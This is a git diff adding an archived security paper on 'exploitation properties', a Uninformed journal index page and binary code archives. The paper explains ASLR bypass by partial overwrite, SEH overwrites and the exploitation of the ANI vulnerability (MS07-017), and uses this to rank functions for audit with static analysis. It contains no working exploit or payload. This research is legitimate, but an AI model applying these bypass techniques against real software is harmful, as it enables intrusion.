+have a vulnerability that would permit a partial overwrite. In this example,
+f is called by h and y. In order to permit the use of a partial overwrite, a
+useful opcode must be found within the same 16-page aligned region that
+either h or y resides on. If a useful opcode is present, an exploitation
+property can be attached to f in order to indicate that a partial overwrite
+may be feasible due to the presence of a useful opcode within the same
+16-page aligned region as either h or y. For example, consider the following
+pseudo-disassembly illustrating a case where the call f instruction in h is
+on the same 16-page region as a useful opcode:
+
+... useful jmp on same 16-page region 0x14c1XXXX
+0x14c1fc04 jmp esp
+... entry point to h()
+0x14c1a910 push ebp
+0x14c1a911 mov ebp, esp
+0x14c1a914 call f
+... entry point to y(), not on same 16-page region
+0x137f44c8 push ebp
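+
+Since 16 pages of 4096 bytes is 0x10000 bytes, the "same 16-page aligned
+region" test above reduces to comparing the high-order 16 bits of two
+addresses: a two-byte partial overwrite of a return address can only redirect
+execution within the 64KB region that the return address already points into.
+The sketch below is purely illustrative; the addresses are taken from the
+pseudo-disassembly above (assuming the call at 0x14c1a914 is a five-byte near
+call), and the return address into y is made up.
+
+#include <stdint.h>
+#include <stdio.h>
+
+/* A useful opcode is only reachable via a two-byte partial overwrite if it
+ * shares the high-order 16 bits with the return address being overwritten. */
+static int same_16page_region(uint32_t ret_addr, uint32_t opcode_addr)
+{
+    return (ret_addr & 0xFFFF0000u) == (opcode_addr & 0xFFFF0000u);
+}
+
+int main(void)
+{
+    uint32_t ret_into_h = 0x14c1a919; /* return address for the call f in h */
+    uint32_t ret_into_y = 0x137f44d0; /* hypothetical return address into y */
+    uint32_t jmp_esp    = 0x14c1fc04; /* the useful opcode                  */
+
+    printf("h: jmp esp reachable = %d\n",
+           same_16page_region(ret_into_h, jmp_esp));
+    printf("y: jmp esp reachable = %d\n",
+           same_16page_region(ret_into_y, jmp_esp));
+    return 0;
+}
+
+An analysis tool could apply the same comparison to every call site of f when
+deciding whether to attach this exploitation property to it.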
+
+While this captures the basic concept, a better approach might be to view a
+binary in a different way. For example, consider the following approach to
+drawing the same conclusion: for each code region that contains a useful
+opcode, identify the subset of functions that are called from call sites
+within the same 16-page aligned region as the useful opcode. This has the
+effect of annotating all of the child functions that could potentially
+leverage a partial overwrite of the return address with respect to a
+particular collection of opcodes.
+
+One important point that must be made about this exploitation property is
+that it is entirely dependent upon the definition of "useful code or data".
+Exploitation is very much an art, and it goes without saying that attempting
+to constrain the approaches that an attacker might make use of is likely to
+be folly. However, defining a known set of useful opcodes and using that set
+as a base with which to draw the above conclusion can be said to be better
+than not doing so at all.
+
+2.4.3) Function or Parent Registers an Exception Handler
+
+One of the unique exploitation vectors that exists in 32-bit programs that
+run on Windows is known as an SEH overwrite[5]. An SEH overwrite makes it
+possible to gain control of execution flow by overwriting an exception
+registration record on the stack. From an exploitation perspective, the act
+of registering an exception handler within a function opens up the
+possibility of making use of an SEH overwrite. Since exception handlers are
+chained, the act of registering an exception handler also implicates any
+functions that are children of a function that registers the exception
+handler. This makes it possible to define an exploitation property that
+illustrates the possibility of an SEH overwrite being abused within the scope
+of a specific set of functions. Detecting this property can be as simple as
+signaturing the compiler-generated code that registers an exception handler
+within a function. An example of two functions, f and g, that would meet
+this criterion can be seen below:
+
+void f() {
+    __try {
+        g();
+    } __except(EXCEPTION_EXECUTE_HANDLER) {
+    }
+}
+
+void g() {
+    ...
+}
+
+In addition to this information being useful from an SEH overwrite
+perspective, it may also benefit an attacker in situations where an exception
+handler simply swallows any exceptions that are dispatched without crashing
+the process[1]. In the example given above, any exception that occurs in the
+context of g will be swallowed by f without necessarily crashing the process.
+This behavior may allow an attacker to retry their exploitation attempt
+multiple times, thus enabling a brute force attack that would otherwise not
+be possible. This can make defeating ASLR more feasible.
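+
+For reference, the exception registration record that an SEH overwrite
+corrupts is the small two-pointer structure that 32-bit Windows links onto
+the stack each time a handler is registered. The sketch below mirrors its
+well-known layout; the field and type names were chosen for illustration
+rather than copied from any particular header.
+
+/* 32-bit SEH registration record as it appears on the stack. An SEH
+ * overwrite overruns a stack buffer until it reaches one of these records
+ * and replaces the handler field (and usually next as well); SafeSEH is
+ * what later decides whether the replaced handler is allowed to run. */
+struct exception_registration_record {
+    struct exception_registration_record *next;    /* next record in chain */
+    void                                 *handler; /* handler entry point  */
+};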
+
+2.4.4) Function is an Exception Handler
+
+The introduction of SafeSEH as a modern compile-time mitigation has caused
+the particulars of how exception handlers are implemented to become more
+interesting. This has to do with the fact that SafeSEH restricts the set of
+exception handlers that may be called by the exception dispatcher to those
+that are specified as being valid within the scope of a given binary. As
+discussed previously in this paper, SafeSEH prevents traditional SEH
+overwrites from being able to use any address as the overwritten exception
+handler. While this is effective in its primary intent, there is still the
+possibility that a valid exception handler can be abused to make exploitation
+more feasible[1]. This scenario is restricted to EH3 and prior exception
+handlers, as EH4 includes a check of a cookie before dispatching exceptions.
+As such, it may be useful to flag the regions of code that are associated
+with EH3 and prior exception handlers, including language-specific exception
+handlers, as being potentially interesting from an exploitation perspective.
+
+Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
+unless every binary that is loaded into a process address space has been
+compiled to make use of SafeSEH. If a binary has not been compiled to make
+use of SafeSEH, an attacker may be able to use any address found within the
+binary's memory mapping as an exception handler in the context of an SEH
+overwrite. This may make exploitation more feasible.
+
+3) Case Study: MS07-017
+
+The animated cursor (ANI) vulnerability was discovered by Alexander Sotirov
+in late 2006 and patched by Microsoft with the MS07-017 critical update in
+April 2007. Apart from being a client-side vulnerability that was exposed
+through web browsers and other mediums, the ANI vulnerability was one of the
+first notable security issues that affected Windows Vista. It was notable
+due to the simple fact that even though Microsoft had touted Windows Vista as
+being the most secure operating system to date, the exploits that were
+released for the ANI vulnerability were very reliable. These exploits were
+able to ignore or defeat the protections offered by mitigations such as GS,
+DEP, and even Vista's newest mitigation: ASLR.
+
+To better understand how this was possible it is important to dive deeper
+into the details of the vulnerability itself. Section 3.1 gives a brief
+description of the ANI vulnerability and some of the techniques that were
+used to successfully exploit it. Following this description, Section 3.2
+illustrates how exploitation properties, in combination with another class of
+properties, can be used to detect functions that may contain vulnerabilities
+similar to the ANI vulnerability. This is meant to help illustrate the
+perceived benefits of applying the concept of exploitation properties to aid
+in the process of identifying regions of code that may deserve additional
+scrutiny based on their perceived exploitability.
+
+3.1) Background
+
+While the ANI vulnerability was certainly unique, it was not the first time
+the animated cursor code was found to have a security issue. Microsoft
+patched an issue that was almost exactly the same as MS07-017 with MS05-002
+roughly two years prior[7]. In both cases, the underlying security issue was
+related to a failure to properly validate input that was derived from the
+contents of an animated cursor file. Alexander Sotirov provided much of the
+initial research on the ANI vulnerability and also gave an excellent write-up
+to this effect[22]. This paper will only attempt to highlight the flaw.
+
+The vulnerability itself was found in user32!LoadAniIcon which is responsible
+for processing a number of different chunks that may be contained within an
+animated cursor file.
Each chunk is a TLV (Type-Length-Value) as described +by the following structure: + +struct ANIChunk +{ + char tag[4]; // ASCII tag + DWORD size; // length of data in bytes + char data[size]; // variable sized data +} + +Keeping this structure in mind, the flaw itself can be seen in the abbreviated +pseudo-code below as modified slightly from Sotirov's original write-up: + +01: int LoadAniIcon(struct MappedFile* file, ...) { +02: struct ANIChunk chunk; +03: struct ANIHeader header; // 36 byte structure +04: while (1) { +05: // read the first 8 bytes of the chunk +06: ReadTag(file, &chunk); +07: switch (chunk.tag) { +08: case 'anih': +09: // read chunk.size bytes into header +10: ReadChunk(file, &chunk, &header); + +On line 6, the chunk header is read into the local variable chunk using +ReadTag which populates the chunk's tag and size fields. If the chunk's tag +is equal to 'anih', the data associated with the chunk is read into the header +local variable using ReadChunk on line 10. The problem is that ReadChunk uses +the size field of the chunk as the amount of data to read from the file. +Since header is a fixed-size (36 byte) data structure and the chunk's size can +be variable, a trivial stack-based buffer overflow may occur if more than 36 +bytes are specified as the chunk size. In terms of the vulnerability, that's +all there is to it, but the implications from an exploitation perspective are +where things start to get interesting. + +When attempting to exploit this vulnerability it may at first appear that all +attempts to do so would be futile. Given Vista's security push, an attacker +would be justified in thinking that surely the LoadAniIcon function is +protected by a GS cookie. This point is especially justified considering the +majority of all binaries shipped with Windows Vista have been compiled with GS +enabled[27]. However, there are indeed circumstances where the compiler will +choose to not enable GS for a specific function. As chance would have it, the +compiler chose not to enable GS for the LoadAniIcon function because of the +simple fact that it does not contain any characteristics that would suggest +that a stack-based buffer overflow might be possible (such as the use of +stack-allocated arrays). This means that an attacker is able to make use of +exploitation techniques that are associated with traditional stack-based +buffer overflows. While this drastically increases the chances of being able +to produce a reliable exploit, there are still other mitigations that are of +potential concern. + +Another mitigation that might be concerning in most circumstances is +hardware-enforced DEP (NX). This would generally prevent an attacker from +being able to run arbitrary code within regions that are not marked as +executable (such as the stack and the heap). However, as fate would have it, +Internet Explorer is configured to not run with DEP enabled. This immediately +removes this concern from the equation for exploits that attempt to trigger +the ANI vulnerability through Internet Explorer. With DEP out of the picture, +ASLR becomes a weakened but still potentially significant hurdle. + +While it may appear that ASLR would be challenging to defeat in most +circumstances, this particular vulnerability provides an example of two +different ways in which ASLR can be bypassed. 
The simplest approach, as taken by Sotirov, involves making use of the fact
+that Internet Explorer is not compiled with support for ASLR and therefore
+can be found at a fixed address within the address space. This allows an
+attacker to make use of opcodes contained within iexplore.exe's memory
+mapping. A second approach, as taken by the author, involves using a partial
+overwrite to ignore the effects of ASLR completely. The details relating to
+how a partial overwrite works were explained in Section 2.4.2. In either
+case, an attacker is able to reliably defeat Vista's ASLR.
+
+To compound the problem, the particulars of the context in which this
+vulnerability occurs make it easier to exploit even without the presence of
+mitigations. This improved reliability comes from the fact that the
+LoadAniIcon function is wrapped in an exception handling context that simply
+swallows exceptions that are encountered. This makes it possible for an
+exploit to fail without actually crashing the process, thus allowing the
+attacker to try multiple times without having to worry about making a mistake
+that crashes the process. When all is said and done, the simplicity of the
+vulnerability and the ease with which mitigations could be bypassed are what
+led to the ANI vulnerability being quite unique. Given the fact that this
+vulnerability can be so easily exploited, it is prudent to describe how the
+affected function could have been identified as high risk.
+
+3.2) Detection
+
+The ease of exploitability associated with the ANI vulnerability makes it an
+obvious candidate for study with respect to the exploitation properties that
+have been described in this paper. It should be possible to use extremely
+simple criteria to accomplish two things. First, the criteria must identify
+the LoadAniIcon function. Second, the criteria should be unique enough to
+limit the size of the narrowed subset. Reducing the subset size is
+beneficial as it may permit the use of more complex program analysis tools
+which can further constrain or explicitly identify instances of
+vulnerabilities. Determining the specific criteria that are needed to
+identify the LoadAniIcon function can help illustrate how one can make use of
+exploitation properties. Given the description of the ANI vulnerability, one
+can easily deduce some of the more interesting properties that it has.
+
+An exploitation property that one might immediately observe is that the
+LoadAniIcon function does not make use of GS (Section 2.4.1). This makes it
+possible to define criteria which state that only functions that have not
+been compiled with GS should be considered. Functions that have been
+compiled with GS are inherently less interesting for the purpose of this
+exercise due to the fact that they are less likely to contain exploitable
+vulnerabilities.
+
+A second property that the ANI vulnerability had with regard to exploitation
+was that it was possible for an attacker to make use of a partial overwrite
+to defeat ASLR. The exploitation property described in Section 2.4.2
+illustrates how one can make this determination statically. In the case of
+the ANI vulnerability, a partial overwrite can be performed by making use of
+a jmp [ebx] that is located within the same 16-page aligned region as the
+caller of LoadAniIcon. Thus, any functions that could potentially make use
+of a partial overwrite can be used as additional criteria.
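+
+As a rough illustration of the narrowing that these two criteria permit
+(described in more detail below), the intersection can be computed with
+nothing more than a bitmask per function. The property flags and all of the
+function names other than LoadAniIcon are made up for the sake of the
+example; LoadAniIcon is shown with both properties because that is what the
+preceding discussion established.
+
+#include <stdio.h>
+
+/* Hypothetical per-function annotations produced by earlier analysis. */
+#define PROP_NO_GS             0x1 /* not compiled with a GS cookie         */
+#define PROP_PARTIAL_OVERWRITE 0x2 /* useful opcode in caller's 64KB region */
+
+struct func_info {
+    const char *name;
+    unsigned    props;
+};
+
+int main(void)
+{
+    struct func_info funcs[] = {
+        { "LoadAniIcon",  PROP_NO_GS | PROP_PARTIAL_OVERWRITE },
+        { "ExampleFuncA", PROP_NO_GS },
+        { "ExampleFuncB", PROP_PARTIAL_OVERWRITE },
+        { "ExampleFuncC", 0 },
+    };
+    unsigned criteria = PROP_NO_GS | PROP_PARTIAL_OVERWRITE;
+    size_t i;
+
+    /* The narrowed subset: functions annotated with every property named
+     * in the criteria. */
+    for (i = 0; i < sizeof(funcs) / sizeof(funcs[0]); i++)
+        if ((funcs[i].props & criteria) == criteria)
+            printf("%s warrants additional scrutiny\n", funcs[i].name);
+
+    return 0;
+}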
+ +At this point, a subset can be produced that is constrained to the regions of +code that are annotated with the GS and partial overwrite exploitation +properties. It is possible to further refine the set of functions that should +ultimately be considered by studying the form that the ANI vulnerability took. +The first point to note is that the stack-based buffer overflow occurred when +writing beyond the bounds of a struct that was allocated on the stack. +Furthermore, the overflow did not actually occur in the immediate context of +the LoadAniIcon itself. Instead, the overflow was triggered by passing a +pointer to the stack-allocated struct as a parameter when calling the function +ReadChunk. + +Based on these data points it is possible to define a third criteria. In this +case, the third criteria is not an exploitation property but is instead an +example of a vulnerability property. While not discussed in detail in this +paper, many examples of vulnerability properties exist, though perhaps not +categorized as such. A vulnerability property can be thought of as an +annotation that illustrates whether or not a region of code has a form that is +similar to that seen in vulnerabilities or has the potential of being a +vulnerability. The complexity of a vulnerability property, as with the +complexity of an exploitation property, can range from highly sophisticated to +very simplistic. + +For the purpose of this paper, a vulnerability property can be used that is +very simple and imprecise but nevertheless effective at further narrowing the +set of functions that should be reviewed. This property is based on whether +or not a function passes a pointer to a stack-allocated variable as a +parameter to a child function. This property is directly derived from the +general form that the ANI vulnerability takes. At a minimum, a region of code +that matches this form suggests that a vulnerability could be present. + +Using these three properties, it should be possible to easily identify both +the function that contains the ANI vulnerability as well as other functions +that could contain similar vulnerabilities. However, it is important to note +that this process does not produce functions that definitely have +vulnerabilities. This can be plainly seen by the fact that both the +vulnerable and fixed versions of the LoadAniIcon should be detected by the +criteria described above. While this may seem to run counter to the purposes +of this paper, it is important for the reader to remember that the goal of +using these exploitation properties is not to identify specific instances of +vulnerabilities. Instead, the goal is to identify regions of code that might +warrant additional scrutiny due to the relative ease with which a +vulnerability could be exploited if one is found to be present. + +3.3) Test Case + +The author developed an analysis tool as an extension to Microsoft's Phoenix +framework in order to test the ideas described in this paper[12]. Unfortunately, +the current release (July 2007 SDK) of Phoenix requires private symbol +information for native binaries. This limitation prevented the author from +being able to run the analysis tool across the vulnerable version of +user32.dll. In lieu of this ability, the author chose to generate a binary +containing test cases that closely mirror the form of the function containing +the ANI vulnerability. 
+ +Using these test cases, the author used the features provided by the analysis +tool to determine the exploitation and vulnerability properties described in +the previous section and to identify the resulting subset of functions meeting +all criteria. This was accomplished by first attempting to identify the +subset of functions that do not contain GS within the scope of the target +binary. After identifying the subset of functions without GS, a second subset +was taken which consists of the functions that pass a pointer to a +stack-allocated local variable as a parameter to a child routine. This was +accomplished by using Phoenix's static single assignment (SSA) and alias +implementations to collect the requisite data flow information[12,25]. Using this +data flow information, it is possible to perform backwards data flow analysis +to determine the potential storage location of the parameter being passed at +each point along a given data flow path starting from the operand associated +with a parameter at a call site. The analysis terminates either when a fixed +point is reached or when it is determined that a pointer to a stack-allocated +variable could be passed as the parameter. + +While the previous section described the potential for using the partial +overwrite exploitation property to detect the function containing the ANI +vulnerability[6], it is not possible to create a meaningful parallel between the +test binary and that of the ANI vulnerability. This is due in part to the +fact that while it would certainly be possible to artificially place a useful +opcode at a specific location in the test binary, it would not add any value +beyond showing that it is possible to detect useful opcodes within the same +16-page aligned region as the caller of a given function. The author feels +that this point is somewhat moot given the fact that it has already been +proven that a partial overwrite can be used with the ANI vulnerability. The +only additional benefit that it could offer in this case would be to help +further constrain the resultant set size. However, without being able to run +this analysis against the vulnerable version of user32.dll, it is not possible +to draw meaningful conclusions at this point in time. + +3.4) Results + +The results of running the analysis tool against the test binary produced the +expected behavior. To illustrate this, it is helpful to consider a sampling +of the functions that were analyzed. The following functions have a form that +is similar to the ANI vulnerability. These functions also match the criteria +described in the previous subsection. Specifically, these functions do not +make use of GS and pass a pointer to a stack-allocated local variable (var) to +a child function: + +int tc_df_pass_local_ptr_to_callee() { + int var; + tc_df_pass_local_ptr_to_callee_func(&var); + return 0; +} +int tc_df_pass_local_ptr_to_callee_alias() { + int var; + int *p = &var; + tc_df_pass_local_ptr_to_callee_func(p); + return 0; +} +int tc_df_pass_local_ptr_to_callee_alias_struct( + struct _foo *foo) { + int var; + foo->ptr = &var; + return tc_df_pass_local_ptr_to_callee_func( + foo->ptr); + return 0; +} + +Additionally, a handful of different test functions were also included in the +target binary in an effort to ensure that other scenarios were not improperly +detected as matching the criteria. 
Some examples of these functions include:
+
+int tc_df_pass_local_to_callee_alias() {
+    int var = 2;
+    int p = var;
+    tc_df_pass_local_to_callee_func(p);
+    return 0;
+}
+int tc_df_pass_local_to_callee_deref() {
+    int var = 2;
+    int *p = &var;
+    tc_df_pass_local_to_callee_func(*p);
+    return 0;
+}
+int tc_df_pass_heap_ptr_to_callee(struct _foo *foo) {
+    tc_df_pass_local_ptr_to_callee_func(&foo->val);
+    return 0;
+}
+
+When running the analysis tool against the target binary, the following
+output is shown:
+
+>PhaseRunner.exe detectani.xml dfa.exe
+Running phase: ANI Detection ... 1 target(s)
+
+Displaying 3 normalizables at the
+ ProgramElement.Method granularity...
+
+00001: dfa!tc_df_pass_local_ptr_to_callee_alias
+00002: dfa!tc_df_pass_local_ptr_to_callee
+00003: dfa!tc_df_pass_local_ptr_to_callee_alias_struct
+
+While this unfortunately does not prove that these techniques could be used
+to identify the function containing the ANI vulnerability, it does
+nevertheless hint at the potential for doing so using the exploitation and
+vulnerability properties suggested above. As an aside, another interesting
+way in which this type of detection can be accomplished is through the use of
+Language Integrated Queries (LINQ), which are now supported in Visual Studio
+2008[11]. For instance, a simple LINQ expression for the above narrowing
+operation can be expressed as:
+
+var matches =
+   from
+     Method method in engine.GetScopeMethods()
+   where
+     !method.IsGuardStackEnabled() &&
+     method.IsPassingStackLocalPtrToChild()
+   select method;
+
+foreach (var method in matches)
+   Console.WriteLine("{0} matches", method);
+
+4) Potential Uses
+
+Program analysis is one area that may benefit from the use of exploitation
+properties. In particular, an auditor can make use of exploitation
+properties to assist in the process of identifying regions of code that
+should be audited more closely or with greater precedence. This
+determination can be made by using exploitation properties to understand the
+ease of exploitation associated with specific binaries or functions. By
+combining this information with other data that is collected either manually
+or automatically, an auditor can get a better understanding of the security
+aspects that are associated with a system. This is beneficial both to an
+attacker and a defender. An attacker can identify regions of code that would
+be easier to exploit and thus devote more time to auditing those regions.
+Likewise, a defender can use this information to the same extent but for
+different purposes. This type of information is especially useful to a
+defender who needs to balance the cost associated with performing security
+reviews because it should offer a better understanding of what the business
+cost might be if a vulnerability is found in a region of code. This cost can
+be derived from the negative publicity and response effort needed to cope
+with a flaw that is publicly disclosed and widely exploited. For example,
+consider some of the Windows flaws that have led to wormable issues and the
+cost they have had relative to other issues.
+
+Exploitation properties may also benefit the security community by helping to
+identify ways in which future mitigations can be applied. This would involve
+analyzing regions of code that could be more easily exploited in an effort to
+determine what other forms of mitigations could help to protect these
+regions, if any.
This information could be fed back to the compiler to make it possible for
+mitigations to be enabled that might otherwise be disabled by default. For
+example, a function that by default would not have GS but is subsequently
+found to be highly exploitable may benefit from having the compiler insert
+GS.
+
+5) Future Work
+
+While this paper has defined exploitation properties and described a handful
+of concrete examples, it has not attempted to formally define the correlation
+between exploitation properties and the exploitation techniques they are
+associated with. Future research will attempt to concretely define this
+relationship as it should lead to a better understanding of the variables
+that permit the use of various exploitation techniques. Using more formal
+definitions of exploitation properties, a larger scale case study can be
+completed which collects data about the effect of using exploitation
+properties to improve program understanding for a variety of purposes. The
+author views exploitation properties as being one component in a larger
+model. This larger model could be used to join major areas of study within
+computer security including attack surface analysis, vulnerability analysis,
+and exploitation analysis to form a more complete understanding of the true
+risks associated with a system.
+
+6) Conclusion
+
+This paper has introduced the general concept of exploitation properties and
+described how they can be used to better understand the exploitability of a
+system. The purpose of an exploitation property is to help convey the ease
+with which a vulnerability might be exploited if one is found to be present.
+Exploitation properties can be broken down into different categories based on
+the configuration or context that a given property is associated with. These
+categories include operating platforms, running processes, binary modules,
+and functions.
+
+Exploitation properties can be used to provide an alternative understanding
+of an application's attack surface from the perspective of which areas would
+be most trivially exploited. This can allow an attacker to focus on finding
+security issues in code that would be more easily exploited. Likewise, a
+defender can draw the same conclusions and direct resources of their own at
+reviewing the associated code. It may also be possible to use this
+information to augment existing mitigations or to come up with new
+mitigations. A contrived example based on the form of the ANI vulnerability
+was used to illustrate an automated approach to extracting exploitation
+properties and using them to help identify a constrained subset of regions of
+code that meet specific criteria. Future research will attempt to better
+define the extent of exploitation properties and their uses.
+
+[1] Dowd, M., Mehta, N., McDonald, J. Breaking C++ Applications.
+    https://www.blackhat.com/presentations/bh-usa-07/Dowd_McDonald_and_Mehta/Whitepaper/bh-usa-07-dowd_mcdonald_and_mehta.pdf
+
+[2] Durden, Tyler. Bypassing PaX ASLR Protection. July, 2002.
+    http://www.phrack.org/issues.html?issue=59&id=9
+
+[3] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
+    http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx
+
+[4] Johnson, Richard. Windows Vista: Exploitation Countermeasures.
+    http://rjohnson.uninformed.org/
+
+[5] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention
+    Mechanism of Microsoft Windows 2003 Server.
+ http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf + +[6] Metasploit. Exploiting the ANI vulnerability on Vista. + http://blog.metasploit.com/2007/04/exploiting-ani-vulnerability-on-vista.html + +[7] Microsoft Corporation. Microsoft Security Bulletin MS05-002. Jan, 2005. + http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx + +[8] Microsoft Corporation. /GS (Buffer Security Check). + http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx + +[9] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers). + http://msdn2.microsoft.com/en-us/library/9a89h429.aspx + +[10] Microsoft Corporation. A detailed description of the Data Execution + Prevention (DEP) feature. http://support.microsoft.com/kb/875352 + +[11] Microsoft Corporation. The LINQ Project. + http://msdn2.microsoft.com/en-us/netframework/aa904594.aspx + +[12] Microsoft Corporation. Phoenix. http://research.microsoft.com/phoenix/ + +[13] Microsoft Corporation. Microsoft Portable Executable and Object File + Format Specification. + http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.doc + +[14] Microsoft Corporation. Threat Modeling. June, 2003. + http://msdn2.microsoft.com/en-us/library/aa302419.aspx + +[15] PaX Team. ASLR. http://pax.grsecurity.net/docs/aslr.txt + +[16] Ren, Chris et al. Microsoft Compiler Flaw Technical Note. + http://www.cigital.com/news/index.php?pg=art&artid=70 + +[17] Rahbar, Ali. An analysis of Microsoft Windows Vista's ASLR. Oct, 2006. + http://www.sysdream.com/articles/Analysis-of-Microsoft-Windows-Vista's-ASLR.pdf + +[18] skape, Skywing. Bypassing Windows Hardware-enforced DEP. + http://www.uninformed.org/?v=2&a=4&t=sumry + +[19] skape. Preventing the Exploitation of SEH Overwrites. + http://www.uninformed.org/?v=5&a=2&t=sumry + +[20] skape. Reducing the Effective Entropy of GS Cookies. + http://www.uninformed.org/?v=7&a=2&t=sumry + +[21] Skywing. Vista ASLR is not on by default for image base addresses. + http://www.nynaeve.net/?p=100 + +[22] Sotirov, Alexander. Windows Animated Cursor Stack Overflow + Vulnerability. March, 2007. + http://www.determina.com/security.research/vulnerabilities/ani-header.html + +[23] Wikipedia. Stack-smashing protection. + http://en.wikipedia.org/wiki/Stack-smashing_protection + +[24] Wikipedia. Address space layout randomization. + http://en.wikipedia.org/wiki/ASLR + +[25] Wikipedia. Static single assignment form. + http://en.wikipedia.org/wiki/Static_single_assignment_form + +[26] University of Wisconsin. Wisconsin Program-Slicing Project's Home Page. + http://www.cs.wisc.edu/wpis/html/ + +[27] Whitehouse, Ollie. Analysis of GS protections in Microsoft Windows + Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf diff --git a/uninformed/9.txt b/uninformed/9.txt new file mode 100644 index 0000000..893a1ba --- /dev/null +++ b/uninformed/9.txt @@ -0,0 +1,22 @@ +Engineering in Reverse +An Objective Analysis of the Lockdown Protection System for Battle.net +Skywing +Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. 
The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks were introduced that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
+html | pdf | txt
+
+Exploitation Technology
+ActiveX - Active Exploitation
+warlord
+This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
+html | pdf | txt
+
+Context-keyed Payload Encoding
+I)ruid
+A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic, however, should be unable to decode the payload due to lack of the contextual keying information.
+html | pdf | txt
+
+Improving Software Security Analysis using Exploitation Properties
+skape
+Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach.
It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration. +html | pdf | txt + diff --git a/uninformed/code.1.1.tgz b/uninformed/code.1.1.tgz new file mode 100644 index 0000000..03710c9 Binary files /dev/null and b/uninformed/code.1.1.tgz differ diff --git a/uninformed/code.1.4.tgz b/uninformed/code.1.4.tgz new file mode 100644 index 0000000..45b6fb5 Binary files /dev/null and b/uninformed/code.1.4.tgz differ diff --git a/uninformed/code.2.2.tgz b/uninformed/code.2.2.tgz new file mode 100644 index 0000000..36456f0 Binary files /dev/null and b/uninformed/code.2.2.tgz differ diff --git a/uninformed/code.3.3.tgz b/uninformed/code.3.3.tgz new file mode 100644 index 0000000..c15697b Binary files /dev/null and b/uninformed/code.3.3.tgz differ diff --git a/uninformed/code.3.6.tgz b/uninformed/code.3.6.tgz new file mode 100644 index 0000000..6af67eb Binary files /dev/null and b/uninformed/code.3.6.tgz differ diff --git a/uninformed/code.4.4.tgz b/uninformed/code.4.4.tgz new file mode 100644 index 0000000..2debc0d Binary files /dev/null and b/uninformed/code.4.4.tgz differ diff --git a/uninformed/code.6.1.tgz b/uninformed/code.6.1.tgz new file mode 100644 index 0000000..e00a964 Binary files /dev/null and b/uninformed/code.6.1.tgz differ diff --git a/uninformed/code.6.2.tgz b/uninformed/code.6.2.tgz new file mode 100644 index 0000000..c38842c Binary files /dev/null and b/uninformed/code.6.2.tgz differ diff --git a/uninformed/code.6.3.tgz b/uninformed/code.6.3.tgz new file mode 100644 index 0000000..604cd0c Binary files /dev/null and b/uninformed/code.6.3.tgz differ diff --git a/uninformed/code.7.1.tgz b/uninformed/code.7.1.tgz new file mode 100644 index 0000000..dedad8b Binary files /dev/null and b/uninformed/code.7.1.tgz differ diff --git a/uninformed/code.7.2.tgz b/uninformed/code.7.2.tgz new file mode 100644 index 0000000..e305550 Binary files /dev/null and b/uninformed/code.7.2.tgz differ diff --git a/uninformed/code.8.1.tgz b/uninformed/code.8.1.tgz new file mode 100644 index 0000000..afe4e57 Binary files /dev/null and b/uninformed/code.8.1.tgz differ diff --git a/uninformed/code.8.2.tgz b/uninformed/code.8.2.tgz new file mode 100644 index 0000000..3ddb5c7 Binary files /dev/null and b/uninformed/code.8.2.tgz differ diff --git a/uninformed/code.8.3.tgz b/uninformed/code.8.3.tgz new file mode 100644 index 0000000..a0adf0c Binary files /dev/null and b/uninformed/code.8.3.tgz differ diff --git a/uninformed/code.8.4.zip b/uninformed/code.8.4.zip new file mode 100644 index 0000000..c2cce7f Binary files /dev/null and b/uninformed/code.8.4.zip differ diff --git a/uninformed/code.8.6.tgz b/uninformed/code.8.6.tgz new file mode 100644 index 0000000..9e84a99 Binary files /dev/null and b/uninformed/code.8.6.tgz differ